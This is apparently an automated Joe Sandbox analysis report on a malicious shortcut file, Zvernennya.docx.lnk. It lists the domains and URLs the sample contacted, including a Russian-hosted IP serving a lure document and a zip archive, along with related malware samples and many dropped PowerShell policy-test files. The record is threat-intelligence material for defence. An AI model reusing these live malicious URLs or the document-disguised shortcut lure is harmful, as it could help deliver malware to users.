Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
bg.microsoft.map.fastly.net
199.232.210.172
truefalse
    		high
    pki-goog.l.google.com
    		108.177.122.94
    		truefalse
      		high
      c.pki.goog
      		unknown
      		unknownfalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://146.185.239.10/burka/Zvernennya.docxfalse
        • Avira URL Cloud: safe
        		unknown
        http://146.185.239.10/avast.zipfalse
        • Avira URL Cloud: safe
        		unknown

        URLs from Memory and Binaries

        NameSourceMaliciousAntivirus DetectionReputation
        http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpfalse
          		high
          https://aka.ms/winsvr-2022-pshelppowershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1415700621.000001DD9FC9C000.00000004.00000800.00020000.00000000.sdmpfalse
            		high
            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpfalse
              		high
              https://go.microsoft.copowershell.exe, 00000000.00000002.1452760323.000001DDB60C7000.00000004.00000020.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  https://go.micro/fwlink/?LinkId=powershell.exe, 00000000.00000002.1454945277.000001DDB634E000.00000004.00000020.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  		unknown
                  http://crl.microsoftpowershell.exe, 00000000.00000002.1453912574.000001DDB630C000.00000004.00000020.00020000.00000000.sdmpfalse
                    		high
                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high
                      https://go.micropowershell.exe, 00000000.00000002.1454945277.000001DDB634E000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://146.185.239.10powershell.exe, 00000000.00000002.1415700621.000001DD9EDA3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1415700621.000001DD9E66A000.00000004.00000800.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://contoso.com/powershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://contoso.com/Licensepowershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                https://contoso.com/Iconpowershell.exe, 00000000.00000002.1444198803.000001DDADFE3000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://aka.ms/winsvr-2022-pshelpXpowershell.exe, 00000000.00000002.1415700621.000001DD9FF16000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1415700621.000001DD9FEF0000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://aka.ms/pscore68powershell.exe, 00000000.00000002.1415700621.000001DD9DF71000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      http://www.microsoft.cpowershell.exe, 00000000.00000002.1454945277.000001DDB634E000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1415700621.000001DD9DF71000.00000004.00000800.00020000.00000000.sdmpfalse
                                          		high
                                          https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1415700621.000001DD9E199000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high

                                            World Map of Contacted IPs

                                            • No. of IPs < 25%
                                            • 25% < No. of IPs < 50%
                                            • 50% < No. of IPs < 75%
                                            • 75% < No. of IPs

                                            Public IPs

                                            IPDomainCountryFlagASNASN NameMalicious
                                            146.185.239.10
                                            		unknownRussian Federation
                                            		34665PINDC-ASRUfalse

                                            General Information

                                            Joe Sandbox version:42.0.0 Malachite
                                            Analysis ID:1665079
                                            Start date and time:2025-04-15 08:08:13 +02:00
                                            Joe Sandbox product:CloudBasic
                                            Overall analysis duration:0h 3m 35s
                                            Hypervisor based Inspection enabled:false
                                            Report type:full
                                            Cookbook file name:default.jbs
                                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                            Number of analysed new started processes analysed:6
                                            Number of new started drivers analysed:0
                                            Number of existing processes analysed:0
                                            Number of existing drivers analysed:0
                                            Number of injected processes analysed:0
                                            Technologies:
                                            • HCA enabled
                                            • EGA enabled
                                            • AMSI enabled
                                            Analysis Mode:default
                                            Analysis stop reason:Timeout
                                            Sample name:Zvernennya.docx.lnk
                                            Detection:MAL
                                            Classification:mal76.evad.winLNK@2/29@1/1
                                            EGA Information:Failed
                                            HCA Information:Failed
                                            Cookbook Comments:
                                            • Found application associated with file extension: .lnk
                                            • Stop behavior analysis, all processes terminated

                                            Warnings

                                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, conhost.exe
                                            • Excluded IPs from analysis (whitelisted): 172.202.163.200
                                            • Excluded domains from analysis (whitelisted): c2a9c95e369881c67228a6591cac2686.clo.footprintdns.com, ax-ring.msedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                            • Execution Graph export aborted for target powershell.exe, PID 7484 because it is empty
                                            • Not all processes where analyzed, report is missing behavior information
                                            • Report size getting too big, too many NtCreateKey calls found.
                                            • Report size getting too big, too many NtQueryAttributesFile calls found.
                                            • Report size getting too big, too many NtSetInformationFile calls found.

                                            Simulations

                                            Behavior and APIs

                                            TimeTypeDescription
                                            02:09:14API Interceptor41x Sleep call for process: powershell.exe modified

                                            Joe Sandbox View / Context

                                            IPs

                                            No context

                                            Domains

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            pki-goog.l.google.comSecuriteInfo.com.Trojan.MulDrop21.55508.32574.17762.exeGet hashmaliciousXWormBrowse
                                            • 64.233.177.94
                                            Galaxy Swapper v2.0.3.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                            • 142.250.9.94
                                            https://reviewcomenntsiite.com/Get hashmaliciousAsyncRAT, DcRatBrowse
                                            • 172.217.215.94
                                            js (2).jsGet hashmaliciousUnknownBrowse
                                            • 142.251.15.94
                                            http://rednosehorse.comGet hashmaliciousUnknownBrowse
                                            • 74.125.138.94
                                            Proforma Invoice 070425.jsGet hashmaliciousAgentTeslaBrowse
                                            • 172.253.124.94
                                            CFD_I1328________________.exeGet hashmaliciousDarkCloudBrowse
                                            • 74.125.138.94
                                            PO#86637.exeGet hashmaliciousFormBookBrowse
                                            • 74.125.138.94
                                            bceff6c50e52949809b37dad0e10534d3a0c81682a3fb036.ps1Get hashmaliciousLummaC StealerBrowse
                                            • 74.125.136.94
                                            SecuriteInfo.com.Trojan.KillProc2.24407.12035.31681.exeGet hashmaliciousMSIL Logger, MassLogger RATBrowse
                                            • 108.177.122.94
                                            bg.microsoft.map.fastly.nethttps://chesterinc.hostedrmm.com:8040/Bin/ScreenConnect.Client.exe?h=chesterinc.hostedrmm.com&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQAb%2Ba8JnksMuE94%2FFa3iIA2%2BIdJkS%2B4Cd3FzJj08ADQfPz6rXd85qBdm5WtC2VPJjA5mW0lerlRHwHpGNuYi709EGQa%2Bn73%2BhVXsBuXoP3fPQvzv6wzkxwKneOuarBV0A3XG2zP8g7y6as6ttZivNe%2BsnN3aYcnMeq0qw9Gysa%2FyhqJ4i6d0MLyP3NbSrMKBkunQw0EvLpDb2J2AFbioIWnTLlqea818yUT7%2BobxBEkKPgBkc2JuYCMgopI%2BvEbauxPwXxccFyZtOwwt3VbqJY29B1wJ%2BTGACE5zHkacCHuGBi%2FMEzOqQnyU7jNjZfN4yFLt1YVfQUOp%2FjAvYYFDq3F&s=9c887587-e172-497f-8ec0-c46097286833&i=Untitled%20Session&e=Support&y=Guest&r=Get hashmaliciousScreenConnect ToolBrowse
                                            • 199.232.214.172
                                            R93FadYc2e.pdfGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            original.emlGet hashmaliciousHTMLPhisher, Invisible JS, Tycoon2FABrowse
                                            • 199.232.210.172
                                            pagamento8449.pdfGet hashmaliciousInvisible JS, Tycoon2FABrowse
                                            • 199.232.214.172
                                            Galaxy Swapper v2.0.3.exeGet hashmaliciousLummaC Stealer, XmrigBrowse
                                            • 199.232.210.172
                                            https://reviewcomenntsiite.com/Get hashmaliciousAsyncRAT, DcRatBrowse
                                            • 199.232.214.172
                                            js (2).jsGet hashmaliciousUnknownBrowse
                                            • 199.232.214.172
                                            TemplatePedidoExtracaoDSI_original_.xlsmGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            http://rednosehorse.comGet hashmaliciousUnknownBrowse
                                            • 199.232.210.172
                                            ENQUIRY OFFICE BUILDING SHAKHBOUT CITY PURCAHSE ORDER454646.exeGet hashmaliciousAsyncRAT, DcRatBrowse
                                            • 199.232.214.172

                                            ASNs

                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                            PINDC-ASRUxbot.ppc.elfGet hashmaliciousMiraiBrowse
                                            • 5.188.210.183
                                            5I6ESk1.exe1.exeGet hashmaliciousUnknownBrowse
                                            • 146.185.239.101
                                            2P0duQVPTB.exeGet hashmaliciousGuLoaderBrowse
                                            • 5.188.166.37
                                            z87nYTGOFb.exeGet hashmaliciousGuLoaderBrowse
                                            • 5.188.166.37
                                            z87nYTGOFb.exeGet hashmaliciousGuLoaderBrowse
                                            • 5.188.166.37
                                            HkVwahg68i.exeGet hashmaliciousGuLoaderBrowse
                                            • 5.188.166.37
                                            9LD5p7y6y8.exeGet hashmaliciousGuLoaderBrowse
                                            • 5.188.166.37
                                            #U0430#U0432#U0442#U043e#U0431#U0456#U043e#U0433#U0440#U0430#U0444#U0456#U044f_shirokih_og.lnkGet hashmaliciousUnknownBrowse
                                            • 146.185.239.51
                                            spc.elfGet hashmaliciousMiraiBrowse
                                            • 31.184.241.238
                                            Quote_2025-0770915101-UAE-25_pdf.exeGet hashmaliciousGuLoaderBrowse
                                            • 5.188.166.37

                                            JA3 Fingerprints

                                            No context

                                            Dropped Files

                                            No context

                                            Created / dropped Files

                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:data
                                            Category:dropped
                                            Size (bytes):64
                                            Entropy (8bit):1.1628158735648508
                                            Encrypted:false
                                            SSDEEP:3:Nlllulhhf/z:NllU
                                            MD5:B283C769D040651AA26FFE7F1296E297
                                            SHA1:F4B1D91D58C72B439EA4CA55A3E75F5F53A117E5
                                            SHA-256:97677EADF7A2FB6F27A32BAA73C5471A5BA31702A36509AB9FEB478448B2D837
                                            SHA-512:9114535C2EA58850D30DFA7552F420FBAB32FBFD999B0CAC0B8CB050F27EF65FE5BC3749E78B35A2C489561571B5452182197A51DC2B82ADC6DD70D94BEA03D7
                                            Malicious:false
                                            Reputation:moderate, very likely benign file
                                            Preview:@...e................................................@..........

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01hg54wc.rn4.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_01yi0mhk.exb.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2qqlytgw.ci1.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3wbnivgb.mni.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Reputation:high, very likely benign file
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4yj4uvol.0gu.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5rans0v5.ypm.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5sbfnenv.t3o.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bdqb2blo.oea.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cflg2rgw.ent.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eslsuomc.ctw.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_evtbdbso.saa.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpqr33oo.nwx.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i3ktj0gv.t3b.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ii5bijnp.10o.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ixugdtzw.2po.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkjrb2fh.2lg.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_k5iss0wj.ftk.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_msyxlmqt.sv4.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_opke4s21.ia0.psm1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            File Type:ASCII text, with no line terminators
                                            Category:dropped
                                            Size (bytes):60
                                            Entropy (8bit):4.038920595031593
                                            Encrypted:false
                                            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                            MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                            Malicious:false
                                            Preview:# PowerShell test file to determine AppLocker lockdown mode

                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qqtufwbd.ju1.ps1

                                            Download File
                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
